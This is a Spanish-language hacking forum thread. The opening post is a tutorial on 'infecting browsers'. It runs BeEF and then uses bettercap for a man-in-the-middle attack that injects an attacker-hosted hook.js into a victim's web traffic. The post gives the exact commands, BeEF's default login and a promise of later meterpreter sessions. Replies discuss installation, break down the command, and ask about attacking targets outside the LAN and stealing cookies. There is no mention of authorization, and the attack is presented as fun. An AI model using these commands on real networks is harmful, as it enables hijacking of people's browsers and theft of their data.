comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Infectar navegadores mediante bettercap y BeEF

  • 16 Respuestas
  • 8529 Vistas

karnak1973 y 3 Visitantes están viendo este tema.

Desconectado Lonewolf

  • *
  • Underc0der
  • Mensajes: 9
  • Actividad:
    0%
  • Reputación 2
  • Mente despierta. Cuerpo dormido.
    • Ver Perfil
« en: Octubre 12, 2016, 05:15:03 am »
Hola a todos, en esta entrada vamos a aprender como infectar navegadores con codigo javascript  :)
Primero un poco de teoria.

¿Que es BeEF?
Basicamente BeEF es un framework diseñado para la explotacion de navegadores atravez de codigo javascript , dicho framework tiene una grandisima cantidad de opciones de post-explotacion que vamos a ver en profundidad en las siguientes entradas .


¿Que es Bettercap ?
Bettercap es un framework para ataques MITM (man in the middle) completo y modular que surgió con el objetivo de brindarnos una herramienta mas completa y estable que ettercap.

Ahora pasemos a la parte divertida ;)


Primero vamos a abrir un terminal y vamos a correr beef con el siguiente comando:
Código: [Seleccionar]
beef-xss


Luego de lanzar este comando automaticamente se nos tendria que abrir una ventana del navegador asi:




En el caso de que el navegador no se abra lo abrimos nosotros y colocamos la siguiente direccion: http://127.0.0.1:3000/ui/panel

El usuario y contraseña por efecto son:

user: beef
pass: beef




Ok, por ahora dejariamos beef asi, pasemos a Bettercap:

Abrimos otra terminal en la que lanzaremos bettercap indicandole nuestro target (objetivo) , el modulo que vamos a utilizar y la ruta del javascript malicioso proporcionado por beef con el siguiente comando:
Código: [Seleccionar]
bettercap -T 192.168.0.101 --proxy-module injectjs --js-url "http://192.168.0.104:3000/hook.js"


Luego tendriamos que ver lo siguiente:




ahora vamos a ver como bettercap inyecta el codigo javascript que le indicamos en las peticiones de nuestra victima  8)




Muy bien como vemos nuestra victima ingreso a la pagina m.taringa.net desde su android , ( en este caso la maquina victima es un smartphone pero el ataque es igualmente eficaz en cualquier tipo de dispositivo o so ) y la herramienta automaticamente inyecto el codigo javascript .
Bien ahora veamos que pasa por el lado de nuestro querido beef:




Perfecto!!! veamos la informacion de el navegador victima.




Muy bien asta aca llego este post , esten atentos a nuevas entradas ya que aprenderemos a obtener una sesion de meterpreter mediante esta gran herramienta .



« Última modificación: Octubre 13, 2016, 12:05:25 pm por HATI »
"Todos tenemos un defecto , un error en nuestro código "

Desconectado dynyly

  • *
  • Underc0der
  • Mensajes: 25
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Octubre 12, 2016, 09:18:53 pm »
 :) :)
esperando mas  ;D ;D ;D
gracias

Desconectado ceroMee

  • *
  • Underc0der
  • Mensajes: 37
  • Actividad:
    0%
  • Reputación 1
    • Ver Perfil
    • Email
« Respuesta #2 en: Octubre 12, 2016, 09:46:32 pm »
muy interesante man, lo que no veo en la imagen es el javascript malicioso que dices que inyecta!! igual voy a probarlo, muchas gracias por tu aporte!

Desconectado Lonewolf

  • *
  • Underc0der
  • Mensajes: 9
  • Actividad:
    0%
  • Reputación 2
  • Mente despierta. Cuerpo dormido.
    • Ver Perfil
« Respuesta #3 en: Octubre 13, 2016, 12:47:51 am »
muy interesante man, lo que no veo en la imagen es el javascript malicioso que dices que inyecta!! igual voy a probarlo, muchas gracias por tu aporte!
Gracias por el comentario ceroMee !!! , fijate en la parte baja de la imajen donde dice [INJECTJS] eso seria parte de el proceso , no pude colocar todo el proceso ya que serian muchas imagenes jaja
"Todos tenemos un defecto , un error en nuestro código "

Desconectado Maaiion

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Octubre 13, 2016, 02:30:49 am »
Suena interesante, pero no entendí la parte de inyectar a la victima, se le atacara mediante dirección mac o como?
buen aporte :DD

Conectado puntoCL

  • *
  • Moderator
  • Mensajes: 267
  • Actividad:
    3.33%
  • Reputación 5
  • Magallanes no es chile :D
    • Ver Perfil
« Respuesta #5 en: Octubre 13, 2016, 06:30:29 am »
@Maaiion por el navegador

Citar
¿Que es BeEF?
Basicamente BeEF es un framework diseñado para la explotacion de navegadores atravez de codigo javascript , dicho framework tiene una grandisima cantidad de opciones de post-explotacion que vamos a ver en profundidad en las siguientes entradas .





Desconectado ceroMee

  • *
  • Underc0der
  • Mensajes: 37
  • Actividad:
    0%
  • Reputación 1
    • Ver Perfil
    • Email
« Respuesta #6 en: Octubre 13, 2016, 10:03:52 pm »
Man una pregunta, seguiste algun tutorial en especifico para instalr bettercap y beef?

Desconectado Lonewolf

  • *
  • Underc0der
  • Mensajes: 9
  • Actividad:
    0%
  • Reputación 2
  • Mente despierta. Cuerpo dormido.
    • Ver Perfil
« Respuesta #7 en: Octubre 14, 2016, 08:28:53 am »
Man una pregunta, seguiste algun tutorial en especifico para instalr bettercap y beef?
Hola ceromee si , en internet hay varios , primeramente tenes que instalar ruby on rails = sudo apt-get install build-essential ruby-dev libpcap-dev

segundo para instalar bettercap solamente tienes que ejecutar el comando = gem install bettercap ,obiamente despues de tener ruby

y por ulltimo para instalar beef te recomiendo seguir la guia de instalacion en su pagina de github https://github.com/beefproject/beef/wiki/Installation

"Todos tenemos un defecto , un error en nuestro código "

Conectado Slenderhack

  • *
  • Underc0der
  • Mensajes: 112
  • Actividad:
    3.33%
  • Reputación 0
    • Ver Perfil
« Respuesta #8 en: Mayo 26, 2017, 08:11:18 pm »
Saludos chicos , alguien me puede ayudar?
no me funciona pongo a correr bettercap realizo una busqueda en mi dispositivo y no se hookea, que puede ser ?

Desconectado Akrapal

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #9 en: Julio 31, 2017, 03:29:12 pm »
Saludos chicos , alguien me puede ayudar?
no me funciona pongo a correr bettercap realizo una busqueda en mi dispositivo y no se hookea, que puede ser ?

me pasa igual.. dice que inyecta pero nada, probe  con injecthtml pero lo mismo

edit: le instale chrome a la maquina virtual y agarro
« Última modificación: Julio 31, 2017, 03:34:00 pm por Akrapal »

Desconectado dantoor_mx

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
  • El tiempo es tu mejor y mas glorioso recurso.
    • Ver Perfil
    • Revolución Digital
« Respuesta #10 en: Agosto 16, 2017, 10:24:07 am »
Hola de nuevo, creo que para algunos de nosotros seria importante conocer la estructura de los comandos o parte de ella, ya que si bien usamos otros framework o tools mediante la terminal podemos confundirnos al momento de empezar a usar este grandioso Framework, o es una simple opinion en el este caso al tratar de comprender la ultima parte de lo siguiente:

Citar
bettercap -T 192.168.0.101 --proxy-module injectjs --js-url "http://192.168.0.104:3000/hook.js"

Quisiera imaginar que aquí especificas el Target
Citar
-T 192.168.0.101

Aqui especificas el modulo a usar
Citar
--proxy-module injectjs

Aqui pensaria que le pasas opciones del modulo especifico
Citar
--js-url


Y por ultimo la IP del atacante (Tu IP) donde se aloja el JavaScript
Citar
"http://192.168.0.104:3000/hook.js"



Por favor si estoy mal díganmelo para poder entender un poco mas este framework aun no lo comienzo a usar pero me resulto de muy buena pinta este tutorial que creo pudiésemos ocupar para combinarlo con otros vectores.
[color="red"][font="Monotype Corsiva"]La mente es como un paracaídas, Solo funciona si la abres.[/font][/color]

Desconectado b4r7

  • *
  • Underc0der
  • Mensajes: 105
  • Actividad:
    0%
  • Reputación 1
    • Ver Perfil
« Respuesta #11 en: Septiembre 20, 2017, 11:40:20 pm »
Aunque el post sea viejo merece un aplauso.

Muchas gracias!!!

Enviado desde mi GT-I9505 mediante Tapatalk

"La mejor forma de obtener información correcta de los foros, es enviar algo incorrecto y esperar las correcciones"
-- Matthew Austern --

Desconectado PikachuDorado

  • *
  • Underc0der
  • Mensajes: 372
  • Actividad:
    0%
  • Reputación 1
  • Im just a Pikachu
    • Ver Perfil
    • Soporte Ava
« Respuesta #12 en: Noviembre 04, 2017, 11:49:07 pm »
Hola de nuevo, creo que para algunos de nosotros seria importante conocer la estructura de los comandos o parte de ella, ya que si bien usamos otros framework o tools mediante la terminal podemos confundirnos al momento de empezar a usar este grandioso Framework, o es una simple opinion en el este caso al tratar de comprender la ultima parte de lo siguiente:

Citar
bettercap -T 192.168.0.101 --proxy-module injectjs --js-url "http://192.168.0.104:3000/hook.js"

Quisiera imaginar que aquí especificas el Target
Citar
-T 192.168.0.101

Aqui especificas el modulo a usar
Citar
--proxy-module injectjs

Aqui pensaria que le pasas opciones del modulo especifico
Citar
--js-url


Y por ultimo la IP del atacante (Tu IP) donde se aloja el JavaScript
Citar
"http://192.168.0.104:3000/hook.js"



Por favor si estoy mal díganmelo para poder entender un poco mas este framework aun no lo comienzo a usar pero me resulto de muy buena pinta este tutorial que creo pudiésemos ocupar para combinarlo con otros vectores.

Exactamente todo lo que dijiste, es correcto.
Ademas de infectar de forma rapida atravez de spoof, hay forma de hacerlo con un portal cautivo ?
O habria que editar el index.html de /www/var para modificar la pagina del "hook.js" ?
Pikaa~


Desconectado benjap1

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #13 en: Noviembre 05, 2017, 07:45:31 am »
Una pregunta solo se puede hacer en linux? y otra es puedo hacerla con una ip externa? ajena a mi Router?

Conectado puntoCL

  • *
  • Moderator
  • Mensajes: 267
  • Actividad:
    3.33%
  • Reputación 5
  • Magallanes no es chile :D
    • Ver Perfil
« Respuesta #14 en: Noviembre 05, 2017, 10:56:55 am »
Hola @benjap1

Si solo se puede en linux. y y se hacer con una IP externa "fuera de la red LAN"

Saludos..




Desconectado Olger346

  • *
  • Underc0der
  • Mensajes: 35
  • Actividad:
    3.33%
  • Reputación 1
    • Ver Perfil
  • Twitter: @Olger346
« Respuesta #15 en: Noviembre 05, 2017, 08:38:02 pm »
Una pregunta solo se puede hacer en linux? y otra es puedo hacerla con una ip externa? ajena a mi Router?

Podes intentarlo con un emulador como GNS3 o EVE, configurando los nats en cada router y ganar esa experiencia de hacerlo en "wan"....

BTW
Por otro lado, buen post, hubiera sido fantástico que hubieras puesto la imagen del navegador de la victima. Pero igual buen post. Otra cosa que me pareció interesante y no se si se puede hacer con beff (yo nunca lo he usado) pero es curioso que la mayoría de las personas dejan las cookies activas en los navegadores por defecto, entonces si beff poseé un modulo para cookies sería algo más profundo e interesante...

Buen post muchacho
"Cuando se nace pobre, estudiar es el mayor acto de rebeldía contra el sistema. El saber rompe las cadenas de la esclavitud" -Tomas Bulat.

Desconectado matzcontreras

  • *
  • Underc0der
  • Mensajes: 39
  • Actividad:
    13.33%
  • Reputación 0
    • Ver Perfil
« Respuesta #16 en: Noviembre 23, 2018, 06:03:40 pm »
quede con ganas de algo mas....
esta muy bueno el post me gustaria ver pruebas de pentest reales ojala en en alguna ctf para ir tomando experiencia.
me motive aunque quede con el gustito de algo mas..

 

¿Te gustó el post? COMPARTILO!



Conseguir acceso a router CISCO mediante fuerza bruta.

Iniciado por Cl0udswX

Respuestas: 1
Vistas: 6713
Último mensaje Mayo 19, 2015, 05:07:27 pm
por Gabriela
Hacking gmail y google maps mediante metadata

Iniciado por Rootkit_Pentester

Respuestas: 0
Vistas: 1224
Último mensaje Marzo 19, 2018, 11:24:12 am
por Rootkit_Pentester
[outlook] Vector de Ataque Web mediante ingeniería social

Iniciado por hielasangre

Respuestas: 3
Vistas: 2376
Último mensaje Febrero 11, 2014, 02:31:34 am
por Alvares97
Comprometiendo un equipo mediante una extension de Firefox falsa

Iniciado por Pr0ph3t

Respuestas: 0
Vistas: 2046
Último mensaje Junio 01, 2012, 09:22:19 am
por Pr0ph3t
Doxing usuarios de mercadolibre mediante google

Iniciado por Rootkit_Pentester

Respuestas: 2
Vistas: 2256
Último mensaje Abril 28, 2017, 02:17:01 pm
por Rootkit_Pentester